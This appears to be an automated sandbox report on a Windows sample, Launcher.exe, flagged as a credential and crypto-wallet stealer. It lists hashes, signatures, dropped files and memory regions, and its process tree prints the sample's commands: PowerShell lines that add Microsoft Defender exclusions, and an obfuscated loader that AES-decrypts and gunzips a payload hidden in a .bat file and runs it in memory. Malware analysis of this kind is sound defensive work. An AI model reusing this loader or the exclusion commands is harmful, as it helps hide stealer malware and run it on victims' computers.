Analysis

  • max time kernel
    62s
  • max time network
    71s
  • platform
    windows10-1703_x64
  • resource
    win10-20230703-en
  • resource tags

    arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-08-2023 22:36

General

  • Target

    Launcher.exe

  • Size

    148.9MB

  • MD5

    0413f927661212f44a19475d7110e97d

  • SHA1

    3f4431b1e32995777a7d234a2e7604674d7763e0

  • SHA256

    8df009feace560a1ad2466d60cb90b5be793021b2fbb5af90a13645a137e317e

  • SHA512

    15e94706d36e419adefe51be8566d41e945d30e8fc89dbcc19d67da9efe823665b54064a8a246d8a61c5bf8760d196f00f46fe11f04c5e9992f9e8ac5cb89035

  • SSDEEP

    786432:A5N1mgE/WgDe6UmdCvF4N3RtI9n1gqBf8IC3ZNXDPWsUwZnb5xFTtLwSTRpf4P1d:qSgU/UmamUyqt8yctjdqSjR2

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\TempFolder
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3828
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\TempFolder\White.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3476
      • C:\Users\Admin\AppData\Roaming\TempFolder\White.bat.exe
        "White.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_BEfTf = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\TempFolder\White.bat').Split([Environment]::NewLine);foreach ($_CASH_cSMGB in $_CASH_BEfTf) { if ($_CASH_cSMGB.StartsWith(':: @')) { $_CASH_tiCLs = $_CASH_cSMGB.Substring(4); break; }; };$_CASH_tiCLs = [System.Text.RegularExpressions.Regex]::Replace($_CASH_tiCLs, '_CASH_', '');$_CASH_YOQbw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_tiCLs);$_CASH_IiqDP = New-Object System.Security.Cryptography.AesManaged;$_CASH_IiqDP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_IiqDP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_IiqDP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZGLYQpXzqZGio1AM3RKuGPD761wgVPaj/0ACagm3x4Q=');$_CASH_IiqDP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8fyzMDu1kB6HN1zdS5E5ew==');$_CASH_dmOzy = $_CASH_IiqDP.CreateDecryptor();$_CASH_YOQbw = $_CASH_dmOzy.TransformFinalBlock($_CASH_YOQbw, 0, $_CASH_YOQbw.Length);$_CASH_dmOzy.Dispose();$_CASH_IiqDP.Dispose();$_CASH_LIOIB = New-Object System.IO.MemoryStream(, $_CASH_YOQbw);$_CASH_Fjwxu = New-Object System.IO.MemoryStream;$_CASH_XnHig = New-Object System.IO.Compression.GZipStream($_CASH_LIOIB, [IO.Compression.CompressionMode]::Decompress);$_CASH_XnHig.CopyTo($_CASH_Fjwxu);$_CASH_XnHig.Dispose();$_CASH_LIOIB.Dispose();$_CASH_Fjwxu.Dispose();$_CASH_YOQbw = $_CASH_Fjwxu.ToArray();$_CASH_gCWCr = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_YOQbw);$_CASH_mvcbk = $_CASH_gCWCr.EntryPoint;$_CASH_mvcbk.Invoke($null, (, [string[]] ('')))
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3996
    • C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe
      "C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe"
      2⤵
      • Executes dropped EXE
      PID:3460
  • C:\Windows\system32\werfault.exe
    werfault.exe /h /shared Global\c6a3d625e5d54115a10522355501cecf /t 768 /p 4104
    1⤵
      PID:4492

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      8592ba100a78835a6b94d5949e13dfc1

      SHA1

      63e901200ab9a57c7dd4c078d7f75dcd3b357020

      SHA256

      fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

      SHA512

      87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      62cccd1805930eb428863ffb5fc015a5

      SHA1

      e9815f0969bc30d94fd88644cd603a0a696bef54

      SHA256

      336349c537548b230381bdd14f45f27f282c6269b2dc485c37d7a472c8d382b4

      SHA512

      e261da720bbe9429bc0b74e34d878852ac0c81d1851fd60cd91890db7c1a606ffc4f8425677e9ed634047cc08a0ef9702c5f269fd53b7e5533be19b9f67528e6

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      4KB

      MD5

      9fbdba17f565293b9533414220476dd3

      SHA1

      8fbc95c108355ba6767b8fafd61c3c3f07fcf0a9

      SHA256

      ff7173dfc80ede468fb3e66af0061b973ad3472b63cfa0d808856cd87c8c0238

      SHA512

      32952309adae6cbbd86b3cb8e345e3233e618b618b43c6eb1e59e7d693a6f1c45e6a687263715356863501f915ed32b60776c316dd2b659eb9683068ea41b97d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axch5gaf.gie.ps1

      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    • C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe

      Filesize

      2.4MB

      MD5

      06c8202d2099957c9306f015df5d0139

      SHA1

      4d59241817e25e858680f7658e5f5bb7fb74d8a3

      SHA256

      80bf899a2d9d24288525e8d41597efbb4612facc06f69910b9cfc1b285d44544

      SHA512

      9fb30ac11279cb2b5e4d50b0b998b2d04498758c8dc78ff8c12b0e907d24037aa0cc8a7ecf6416e858a9110441e4ce8661f2cda29508bf089871e9a07d8430be

    • C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe

      Filesize

      2.4MB

      MD5

      06c8202d2099957c9306f015df5d0139

      SHA1

      4d59241817e25e858680f7658e5f5bb7fb74d8a3

      SHA256

      80bf899a2d9d24288525e8d41597efbb4612facc06f69910b9cfc1b285d44544

      SHA512

      9fb30ac11279cb2b5e4d50b0b998b2d04498758c8dc78ff8c12b0e907d24037aa0cc8a7ecf6416e858a9110441e4ce8661f2cda29508bf089871e9a07d8430be

    • C:\Users\Admin\AppData\Roaming\TempFolder\White.bat

      Filesize

      449KB

      MD5

      b06355cf59db16e77fa973f744f15cd0

      SHA1

      62ab10cdc8694d62c2347214ae32ecab473559db

      SHA256

      50d8918d86e0d6643ce087d1820060f9839be808692d6eb0085ab0806e9a7beb

      SHA512

      e1fdfa1f4da423c9f4e5b700dc4fa1815cefe8701629130e2bc19b75b30c27bedb1832edc9f64e809538a59cfa4256f5f5dfb220eb81e4a1cc371c0872939fc3

    • C:\Users\Admin\AppData\Roaming\TempFolder\White.bat.exe

      Filesize

      435KB

      MD5

      f7722b62b4014e0c50adfa9d60cafa1c

      SHA1

      f31c17e0453f27be85730e316840f11522ddec3e

      SHA256

      ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

      SHA512

      7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

    • C:\Users\Admin\AppData\Roaming\TempFolder\White.bat.exe

      Filesize

      435KB

      MD5

      f7722b62b4014e0c50adfa9d60cafa1c

      SHA1

      f31c17e0453f27be85730e316840f11522ddec3e

      SHA256

      ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

      SHA512

      7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

    • \Users\Admin\AppData\Local\Temp\.net\Launcher\BzgCgbfZ7GWrOkrapwDvBXaeXpeaAAE=\D3DCompiler_47_cor3.dll

      Filesize

      4.7MB

      MD5

      2191e768cc2e19009dad20dc999135a3

      SHA1

      f49a46ba0e954e657aaed1c9019a53d194272b6a

      SHA256

      7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d

      SHA512

      5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970

    • \Users\Admin\AppData\Local\Temp\.net\Launcher\BzgCgbfZ7GWrOkrapwDvBXaeXpeaAAE=\PresentationNative_cor3.dll

      Filesize

      1.2MB

      MD5

      c7bcc68b81e965fe74ef58d503c58deb

      SHA1

      99990f204f7318eeb8de6f9664ebcd0d42ea81b7

      SHA256

      06cb4da78f5cfddece86329241a2af9d6390ce1082b02f7db2e3bf320215a23e

      SHA512

      cab2bc27eca0ee097324a2471c8228f1723cfef5df9971359eec7710082c122b26a7aa1d1e6faab75389438a358bbff2973ad67e8dd9046455b4c4ac880d858c

    • \Users\Admin\AppData\Local\Temp\.net\Launcher\BzgCgbfZ7GWrOkrapwDvBXaeXpeaAAE=\wpfgfx_cor3.dll

      Filesize

      1.9MB

      MD5

      1b01746fe61beb761a643050823190b0

      SHA1

      927b12e4a733bcc51545c6a005838a24b8dc4dda

      SHA256

      f8c4d6eb1cfa9c5b6fb322a0c818a4f5d5ee44043c259e0262c0460513953fb8

      SHA512

      83eeb187e554588a5a4efbce0fcb7e9c30e718ec9f6d797a7add28036e3d4506cd3e78386522467d7ac967a60ac509a23edd79a1b9032a7e230d980b9f36080a

    • memory/3460-740-0x0000000004E10000-0x0000000004EAC000-memory.dmp

      Filesize

      624KB

    • memory/3460-738-0x0000000000280000-0x00000000004F8000-memory.dmp

      Filesize

      2.5MB

    • memory/3460-739-0x0000000073650000-0x0000000073D3E000-memory.dmp

      Filesize

      6.9MB

    • memory/3828-249-0x00000167F3F10000-0x00000167F3F20000-memory.dmp

      Filesize

      64KB

    • memory/3828-236-0x00000167F41A0000-0x00000167F4216000-memory.dmp

      Filesize

      472KB

    • memory/3828-233-0x00000167F3F10000-0x00000167F3F20000-memory.dmp

      Filesize

      64KB

    • memory/3828-232-0x00000167F3F10000-0x00000167F3F20000-memory.dmp

      Filesize

      64KB

    • memory/3828-231-0x00007FFCC1E10000-0x00007FFCC27FC000-memory.dmp

      Filesize

      9.9MB

    • memory/3828-272-0x00000167F3F10000-0x00000167F3F20000-memory.dmp

      Filesize

      64KB

    • memory/3828-230-0x00000167DB990000-0x00000167DB9B2000-memory.dmp

      Filesize

      136KB

    • memory/3828-276-0x00007FFCC1E10000-0x00007FFCC27FC000-memory.dmp

      Filesize

      9.9MB

    • memory/3996-381-0x000001455CE10000-0x000001455CE20000-memory.dmp

      Filesize

      64KB

    • memory/3996-335-0x00007FFCC1AA0000-0x00007FFCC248C000-memory.dmp

      Filesize

      9.9MB

    • memory/3996-384-0x00007FFCC1AA0000-0x00007FFCC248C000-memory.dmp

      Filesize

      9.9MB

    • memory/3996-357-0x000001455CE10000-0x000001455CE20000-memory.dmp

      Filesize

      64KB

    • memory/3996-340-0x000001455CE10000-0x000001455CE20000-memory.dmp

      Filesize

      64KB

    • memory/3996-338-0x000001455CE10000-0x000001455CE20000-memory.dmp

      Filesize

      64KB

    • memory/4104-49-0x000002B2DDA80000-0x000002B2DDA8D000-memory.dmp

      Filesize

      52KB

    • memory/4104-73-0x000002B2FE500000-0x000002B2FE540000-memory.dmp

      Filesize

      256KB

    • memory/4104-69-0x000002B2FE3F0000-0x000002B2FE406000-memory.dmp

      Filesize

      88KB

    • memory/4104-89-0x000002B2FEFF0000-0x000002B2FF0E4000-memory.dmp

      Filesize

      976KB

    • memory/4104-61-0x000002B2DDA90000-0x000002B2DDA97000-memory.dmp

      Filesize

      28KB

    • memory/4104-57-0x000002B2FE230000-0x000002B2FE243000-memory.dmp

      Filesize

      76KB

    • memory/4104-53-0x000002B2DDA70000-0x000002B2DDA75000-memory.dmp

      Filesize

      20KB

    • memory/4104-97-0x000002B2FE5B0000-0x000002B2FE5F7000-memory.dmp

      Filesize

      284KB

    • memory/4104-45-0x000002B2FE480000-0x000002B2FE4FF000-memory.dmp

      Filesize

      508KB

    • memory/4104-12-0x000002B2FE2E0000-0x000002B2FE3ED000-memory.dmp

      Filesize

      1.1MB

    • memory/4104-15-0x00007FF7828B0000-0x00007FF7831DB000-memory.dmp

      Filesize

      9.2MB

    • memory/4104-225-0x00007FF7828B0000-0x00007FF7831DB000-memory.dmp

      Filesize

      9.2MB

    • memory/4104-41-0x000002B2FF540000-0x000002B2FFD82000-memory.dmp

      Filesize

      8.3MB

    • memory/4104-17-0x000002B280000000-0x000002B280F88000-memory.dmp

      Filesize

      15.5MB

    • memory/4104-37-0x000002B2FE1D0000-0x000002B2FE20E000-memory.dmp

      Filesize

      248KB

    • memory/4104-21-0x000002B2FE620000-0x000002B2FE848000-memory.dmp

      Filesize

      2.2MB

    • memory/4104-33-0x000002B2FE270000-0x000002B2FE2B4000-memory.dmp

      Filesize

      272KB

    • memory/4104-77-0x000002B2FE210000-0x000002B2FE228000-memory.dmp

      Filesize

      96KB

    • memory/4104-25-0x000002B2FE850000-0x000002B2FE9AE000-memory.dmp

      Filesize

      1.4MB

    • memory/4104-81-0x000002B2FE540000-0x000002B2FE552000-memory.dmp

      Filesize

      72KB

    • memory/4104-29-0x000002B2DDAB0000-0x000002B2DDAEC000-memory.dmp

      Filesize

      240KB

    • memory/4104-65-0x000002B2FE2C0000-0x000002B2FE2D9000-memory.dmp

      Filesize

      100KB

    • memory/4104-93-0x000002B2FE420000-0x000002B2FE428000-memory.dmp

      Filesize

      32KB

    • memory/4104-7-0x0000000180000000-0x0000000180A25000-memory.dmp

      Filesize

      10.1MB

    • memory/4532-300-0x00000224F5520000-0x00000224F5530000-memory.dmp

      Filesize

      64KB

    • memory/4532-380-0x00007FFCC1AA0000-0x00007FFCC248C000-memory.dmp

      Filesize

      9.9MB

    • memory/4532-344-0x00000224F6180000-0x00000224F61BE000-memory.dmp

      Filesize

      248KB

    • memory/4532-327-0x00000224F5AC0000-0x00000224F5B24000-memory.dmp

      Filesize

      400KB

    • memory/4532-389-0x00000224F5520000-0x00000224F5530000-memory.dmp

      Filesize

      64KB

    • memory/4532-390-0x00000224F5520000-0x00000224F5530000-memory.dmp

      Filesize

      64KB

    • memory/4532-539-0x00000224F5550000-0x00000224F556E000-memory.dmp

      Filesize

      120KB

    • memory/4532-571-0x00000224F6E10000-0x00000224F6FD2000-memory.dmp

      Filesize

      1.8MB

    • memory/4532-572-0x00000224F7510000-0x00000224F7A36000-memory.dmp

      Filesize

      5.1MB

    • memory/4532-713-0x00000224F55F0000-0x00000224F5640000-memory.dmp

      Filesize

      320KB

    • memory/4532-726-0x00000224F5520000-0x00000224F5530000-memory.dmp

      Filesize

      64KB

    • memory/4532-744-0x00007FFCC65E0000-0x00007FFCC65F0000-memory.dmp

      Filesize

      64KB

    • memory/4532-336-0x00000224F5520000-0x00000224F5530000-memory.dmp

      Filesize

      64KB

    • memory/4532-342-0x00000224F6110000-0x00000224F6122000-memory.dmp

      Filesize

      72KB

    • memory/4532-321-0x00000224F5D80000-0x00000224F5FE4000-memory.dmp

      Filesize

      2.4MB

    • memory/4532-301-0x00000224F5520000-0x00000224F5530000-memory.dmp

      Filesize

      64KB

    • memory/4532-298-0x00007FFCC1AA0000-0x00007FFCC248C000-memory.dmp

      Filesize

      9.9MB

    • memory/4532-339-0x00000224F6250000-0x00000224F635A000-memory.dmp

      Filesize

      1.0MB

    • memory/4532-745-0x00007FFCC1AA0000-0x00007FFCC248C000-memory.dmp

      Filesize

      9.9MB